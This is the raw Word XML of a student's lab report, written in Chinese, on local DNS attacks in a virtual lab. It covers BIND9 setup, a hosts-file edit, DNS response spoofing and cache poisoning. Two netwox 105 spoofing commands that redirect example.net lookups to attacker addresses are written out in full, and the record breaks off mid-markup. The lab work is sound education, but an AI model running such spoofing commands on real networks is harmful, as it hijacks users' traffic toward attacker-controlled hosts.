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EE917C" w14:textId="3B6157B5" w:rsidR="000262B8" w:rsidRDefault="000262B8" w:rsidP="000262B8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83790">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>5-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>eport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015027BB" w14:textId="77777777" w:rsidR="000262B8" w:rsidRDefault="000262B8" w:rsidP="000262B8">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>57117208</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>傅靖邦</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703F48C4" w14:textId="2732CD19" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>ask1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BE9DC2" w14:textId="73B71B00" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置user服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1453C153" w14:textId="77777777" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46896775" wp14:editId="2052BD4F">
            <wp:extent cx="5270500" cy="662940"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="4" name="图片 4" descr="手机屏幕截图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手机屏幕截图&#10;&#10;描述已自动生成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C5322" w14:textId="77777777" w:rsidR="00C03B69" w:rsidRDefault="00C03B69" w:rsidP="00C03B69">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>此时本地的DNS服务器为首选服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E00DDD4" w14:textId="011EC40C" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D52EFE7" wp14:editId="01CA54CD">
            <wp:extent cx="5270500" cy="2524760"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:docPr id="5" name="图片 5" descr="手机屏幕的截图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手机屏幕的截图&#10;&#10;描述已自动生成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4D5C9" w14:textId="2C1A4315" w:rsidR="00C03B69" w:rsidRDefault="00C03B69"/>
    <w:p w14:paraId="068C45EA" w14:textId="213717D5" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>ask2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599A1C3F" w14:textId="5BCC3004" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置BIND9服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435AE4B7" w14:textId="7633F677" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47E13F97" wp14:editId="275154EE">
            <wp:extent cx="4762500" cy="3035300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="手机屏幕截图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手机屏幕截图&#10;&#10;描述已自动生成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3226D" w14:textId="25ACDD2B" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭DNSSEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AD72D1" w14:textId="0CA80E43" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A1EFB46" wp14:editId="09BC0211">
            <wp:extent cx="2586726" cy="397071"/>
            <wp:effectExtent l="0" t="0" r="444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57320" cy="40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4EDD" w14:textId="77777777" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637C9C7" w14:textId="4986C152" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79C2C4DC" wp14:editId="1D971ED6">
            <wp:extent cx="5274310" cy="5384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4C876" w14:textId="74A72C3F" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置好之后，用户可以通过本地域名服务器进行域名解析了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C596359" w14:textId="1C452DEB" w:rsidR="00C03B69" w:rsidRDefault="00C03B69"/>
    <w:p w14:paraId="24FF4905" w14:textId="7575E16A" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465586AF" w14:textId="3EB13F3E" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>在/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bind/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>named.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 中添加信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8FE4E4" w14:textId="30D4051E" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17293452" wp14:editId="5B8B9871">
            <wp:extent cx="2567166" cy="2144826"/>
            <wp:effectExtent l="0" t="0" r="508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0945" cy="214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238A0" w14:textId="6282D058" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:t>创建/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bind/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>example.com.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再添加如下的信息，配置</w:t>
      </w:r>
      <w:r>
        <w:t>forward lookup zone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC08CE7" w14:textId="4F7F9BC1" w:rsidR="00C03B69" w:rsidRDefault="00C03B69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C826462" wp14:editId="02564449">
            <wp:extent cx="5274310" cy="124968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29ED6" w14:textId="432177DD" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启BIND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，输入命令d</w:t>
      </w:r>
      <w:r>
        <w:t>ig example.com</w:t>
      </w:r>
      <w:r w:rsidR="00A942BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以看到显示了</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00A942BE" w:rsidRPr="00657A24">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>www.example.com的</w:t>
        </w:r>
        <w:r w:rsidR="00A942BE" w:rsidRPr="00657A24">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>i</w:t>
        </w:r>
        <w:r w:rsidR="00A942BE" w:rsidRPr="00657A24">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>p</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A942BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2EB4D318" w14:textId="07BFF18F" w:rsidR="00992426" w:rsidRDefault="0099242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5E0DE9F" wp14:editId="7514DF54">
            <wp:extent cx="3887423" cy="2742565"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="8" name="图片 8" descr="电脑屏幕的照片上有文字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电脑屏幕的照片上有文字&#10;&#10;描述已自动生成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893" cy="275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979FD" w14:textId="17D01AB4" w:rsidR="00C03B69" w:rsidRDefault="00C03B69"/>
    <w:p w14:paraId="259D31C0" w14:textId="4479A223" w:rsidR="00992426" w:rsidRDefault="00992426"/>
    <w:p w14:paraId="094DE512" w14:textId="4CFA7678" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>ask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F404E70" w14:textId="5D9E847E" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改hosts文件之前，可以ping通w</w:t>
      </w:r>
      <w:r>
        <w:t>ww.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>ank32.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EDEBA0" w14:textId="14A21AF6" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ABD4B71" wp14:editId="1B03EF64">
            <wp:extent cx="5270500" cy="1134745"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="10" name="图片 10" descr="图片包含 桌子, 游戏机, 人们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片包含 桌子, 游戏机, 人们&#10;&#10;描述已自动生成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114FA" w14:textId="5282CD6B" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>映射，把域名为w</w:t>
      </w:r>
      <w:r>
        <w:t>ww.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>ank32.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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映射到1.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20283E7B" w14:textId="7879DD98" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E2BB17F" wp14:editId="2B1CB517">
            <wp:extent cx="2839501" cy="547662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5874" cy="55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6FB37" w14:textId="2C995414" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00657A24">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>www.bank32.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> 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地址发生了改变</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3502B5E9" w14:textId="113B595D" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C3FF726" wp14:editId="5293503C">
            <wp:extent cx="5274310" cy="23431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ECF3" w14:textId="3F9FB0E3" w:rsidR="00992426" w:rsidRDefault="00992426"/>
    <w:p w14:paraId="6C51BF64" w14:textId="7C63C49D" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7AAF40" w14:textId="785D065C" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起攻击之前</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A346F" w14:textId="23C9DD8D" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="226EBD7F" wp14:editId="0D687BD8">
            <wp:extent cx="5270500" cy="2908935"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5715"/>
            <wp:docPr id="14" name="图片 14" descr="屏幕上有字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屏幕上有字&#10;&#10;描述已自动生成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533E1" w14:textId="4DB2A765" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在攻击机上输入命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7470E618" w14:textId="77777777" w:rsidR="00992426" w:rsidRDefault="00992426" w:rsidP="00992426"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netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 105 -h "example.net" -H "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>﻿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>220.181.38.148" -a "ns.example.com" -A "10.0.2.6" -f "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 host 10.0.2.7" -d enp0s3-T 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4834124E" w14:textId="10D9325E" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次</w:t>
      </w:r>
      <w:r>
        <w:t>dig example.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现用户被重定向到了220.181.38.148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776DFCFD" w14:textId="77777777" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493B619E" w14:textId="60185D46" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6956EC6C" wp14:editId="7AF2A874">
            <wp:extent cx="5270500" cy="3464560"/>
            <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
            <wp:docPr id="16" name="图片 16" descr="手机屏幕的截图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手机屏幕的截图&#10;&#10;描述已自动生成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F24C4" w14:textId="442BE42B" w:rsidR="00992426" w:rsidRDefault="00992426"/>
    <w:p w14:paraId="62DD2F58" w14:textId="149B6AC7" w:rsidR="00992426" w:rsidRDefault="00992426">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295C1628" w14:textId="325BAD91" w:rsidR="00992426" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在攻击机上运行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021E6BA5" w14:textId="7D654B9B" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>udo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 105 -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00657A24">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>www.example.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -H 1.2.3.4 -a ns.example.net -A 1.2.3.5 -f “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> host 10.0.2.7” -s raw -T 600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236DC76" w14:textId="07CC55EF" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把DNS重定向到1.2.3.4和1.2.3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DC6D1" w14:textId="77777777" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>然后打印本地D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45097483" w14:textId="2D00EBE9" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ADCED03" wp14:editId="6D403D89">
            <wp:extent cx="3916762" cy="1906981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9719" cy="191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71506" w14:textId="50EEFEDF" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r w:rsidRPr="00877960">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00877960">
        <w:t>ww.example.com 的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00877960">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00877960">
        <w:t>被重定向</w:t>
      </w:r>
      <w:r w:rsidRPr="00877960">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到了1.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C791223" w14:textId="77777777" w:rsidR="00877960" w:rsidRPr="00877960" w:rsidRDefault="00877960">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A681DD" w14:textId="40201990" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A816E8C" w14:textId="43B5957F" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用户端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28350FF1" w14:textId="2AF097D8" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="379B9E6B" wp14:editId="68193AC5">
            <wp:extent cx="5270500" cy="2783840"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="17" name="图片 17" descr="手机屏幕的截图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手机屏幕的截图&#10;&#10;描述已自动生成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CBD75" w14:textId="089CED73" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在攻击机上编写脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C871C0E" w14:textId="074E143F" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="145B1507" wp14:editId="05426405">
            <wp:extent cx="5270500" cy="1787525"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
            <wp:docPr id="18" name="图片 18" descr="手机屏幕截图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手机屏幕截图&#10;&#10;描述已自动生成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B6297" w14:textId="7B7453A6" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在D</w:t>
      </w:r>
      <w:r>
        <w:t>NSVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的 </w:t>
      </w:r>
      <w:r>
        <w:t>local cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中记录如下信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BA02CA" w14:textId="739DDDD8" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CB49FEB" wp14:editId="6867DD33">
            <wp:extent cx="4673600" cy="203200"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="19" name="图片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48C07" w14:textId="05649EB7" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在用户机上访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00657A24">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>w</w:t>
        </w:r>
        <w:r w:rsidRPr="00657A24">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>ww.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>ireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包，发现访问ex</w:t>
      </w:r>
      <w:r>
        <w:t>ample.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ail.example.net </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的流量都被重定向到了a</w:t>
      </w:r>
      <w:r>
        <w:t>ttacker32.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DA49C0" w14:textId="1E33FF19" w:rsidR="00877960" w:rsidRDefault="00877960">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E7A8F55" wp14:editId="1ED9A24C">
            <wp:extent cx="5270500" cy="361315"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635"/>
            <wp:docPr id="20" name="图片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E327B" w14:textId="22132504" w:rsidR="00877960" w:rsidRPr="00877960" w:rsidRDefault="00877960">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
